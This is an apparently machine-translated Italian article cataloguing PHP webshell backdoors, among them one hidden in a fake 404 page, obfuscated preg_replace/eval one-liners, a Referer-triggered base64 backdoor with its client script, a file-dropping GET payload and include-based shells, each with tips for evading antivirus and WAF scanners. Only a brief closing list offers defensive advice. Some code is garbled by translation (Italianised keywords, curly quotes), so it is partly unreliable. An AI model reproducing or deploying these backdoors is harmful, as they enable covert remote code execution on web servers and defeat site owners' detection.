Trattiamo questi programmi PHP backdoor con una mentalità di apprendimento, e molto codice backdoor PHP ci permette di vedere quanto siano ben intenzionati i programmatori.
Potente backdoor PHP in una sola frase
Questo tipo di backdoor permette ai siti web,Gli amministratori di server sono molto problematici e spesso devono cambiare metodo per eseguire vari rilevamenti, e molte nuove tecniche di scrittura non possono essere scoperte e affrontate con metodi di rilevamento ordinari.
Oggi conteremo alcuni interessanti trojan PHP.
1. Nascondi i pony PHP usando 404 pagine:
[mw_shl_code=php,vero] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Non Trovato</title> </head><body> <h1>Non trovato</h1> <p>L'URL richiesto non è stato trovato su questo server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['errore'],"saft"); intestazione ('HTTP/1.1 404 Non trovato'); ?>[/mw_shl_code]
404 page è un file comunemente usato sul sito web, e poche persone lo controlleranno e modificano dopo che è generalmente consigliato, così possiamo usarlo per nascondere la backdoor.
2. PHP nascosto senza caratteristiche in una frase:
[mw_shl_code=php,true]<?php session_start(); $_POST['codice'] && $_SESSION['ilCodice'] = trim($_POST['codice']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\'])','a'); ?>[/mw_shl_code]
Assegna $_POST['codice'] a $_SESSION['ilCodice'], e poi esegui $_SESSION['ilCodice'], con l'evidenziato che non c'è alcun codice di firma.
Se usi uno strumento di scansione per controllare il codice, non si allerta e raggiungerà l'obiettivo.
3. Backdoor PHP super furtivo:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?> [/mw_shl_code]
La sola funzione GET costituisce un Trojan;
Come utilizzare:
[mw_shl_code=php,vero] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Dopo l'esecuzione, la directory corrente genera c.php un trojan di frase, quando il parametro A viene valutato, la generazione del trojan di errore è fallita, e quando viene assert, riporterà anch'essa un errore, ma genererà un cavallo di, che non può essere sottovalutato.
Richiesta di livello, codice per eseguire la backdoor PHP:
Questo metodo è implementato con due file, file 1
[mw_shl_code=php,true]<?php
//1.php header('Content-type:text/html; Charset=UTF-8′); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10'&& count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
} ?>[/mw_shl_code]
Documento 2
[mw_shl_code=php,true]<?php
//2.php header('Content-type:text/html; Charset=UTF-8′);
//要执行的代码 $code= <<<CODICE phpinfo(); CODICE;
//进行base64编码 $code= base64_encode($code);
//构造referer字符串 $referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url $url= 'http://localhost/test1/1.php'; $ch= curl_init(); $options= array( CURLOPT_URL => $url, CURLOPT_HEADER => FALSO, CURLOPT_RETURNTRANSFER => VERO, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echocurl_exec($ch); ?>[/mw_shl_code]
Esegui codice base64 attraverso il HTTP_REFERER nella richiesta HTTP per ottenere l'effetto backdoor.
È utile usare questa idea per bypassare il waf.
4.PHP generatore di porta posteriore weevely
weevely è uno specifico per PHPIl software gratuito Webshell può essere usato per simulare una shell di connessione simile a quella di telnet, Weevely viene solitamente utilizzato per l'utilizzo di programmi web, nascondere backdoor o utilizzare metodi simili a telnet invece della gestione basata su pagine web; il codice PHP lato server generato da Weevely è codificato base64, quindi può ingannare il software antivirus mainstream e gli IDS, Una volta caricato il codice lato server, di solito puoi farlo passare direttamente tramite Weevely.
Le funzioni usate nella backdoor sono comunemente usate funzioni di elaborazione delle stringhe, e le funzioni come eval e system usate come regole di ispezione non appariranno direttamente nel codice, così che il file backdoor possa bypassare il controllo dello strumento di ricerca backdoor. La scansione con lo strumento di rilevamento backdoor web del gruppo oscuro mostra che il file non è minacciato.
Quanto sopra è un'introduzione generale, e i metodi d'uso rilevanti non vengono presentati qui, una semplice divulgazione scientifica.
4. Tre trojan PHP deformi di una frase La prima:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?> [/mw_shl_code]
Il secondo
[mw_shl_code=php,true]<?php $_=“”; $_[+“”]=”; $_=“$_”.“”; $_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__'];?>[/mw_shl_code]
Scrivi http://site/2.php?_=assert&__=eval($_POST['pass']) password nel coltello da cucina è passata.
Se usi i dati aggiuntivi del coltello da cucina, è più nascosto, oppure puoi usare altri strumenti di iniezione, perché è stato inviato dopo la consegna.
Il terzo
[mw_shl_code=php,vero] ($b 4dboy= $_POST['b4dboy']) & & @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'aggiunge'); [/mw_shl_code]
str_rot13 ('riny') è la valutazione codificata, che evita completamente le parole chiave senza perdere l'effetto, facendo vomitare sangue alle persone!
5. Infine, elenca alcune backdoor avanzate di trojan PHP:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $hh("/[discuz]/e",$_POST['h'],"Accesso"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid']; include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”; $reg($_FILES[MioFile][tmp_name],$_FILES[MioFile][nome]); [/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $gzid("/[discuz]/e",$_POST['h'],"Accesso"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST [mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
In sintesi, queste backdoor PHP possono essere descritte come complete, se non stai attento verrai sicuramente ingannato, e qual è la priorità principale del nostro articolo oggi? I punti chiave sono nel riassunto qui sotto!
Come gestire la backdoor di una frase in PHP: Sottolineiamo alcuni punti chiave, e se leggete questo articolo, credo che non siate un profano, quindi non voglio prolisse:
- Fai attenzione alla sicurezza quando scrivi programmi PHP
- I file di log del server dovrebbero essere letti frequentemente e salvati con frequenza
- Assegnazione rigorosa dei permessi per ogni sito
- Frequenti revisioni di sicurezza batch di file e directory dinamiche
- Impara come eseguire manualmente un antivirus "Indagine e Uccisione del Giudizio Comportamentale"
- Restate sintonizzati o infiltratevi in un campo di cybersecurity attivo
- Anche una funzione può essere utilizzata come regola per l'elaborazione gerarchica dell'ambiente server
Crediamo che quando ci saranno più siti da gestire e una grande quantità di dati, dovremmo ragionevolmente applicare alcuni strumenti ausiliari, ma non dovremmo affidarci completamente a questi strumenti, la tecnologia è in continua evoluzione e miglioramento, la cosa più importante è che tu impari e comprenda il modo di pensare di scrivere queste potenti persone backdoor, e la trasposizione di ruoli può portarti a maggiori progressi.
|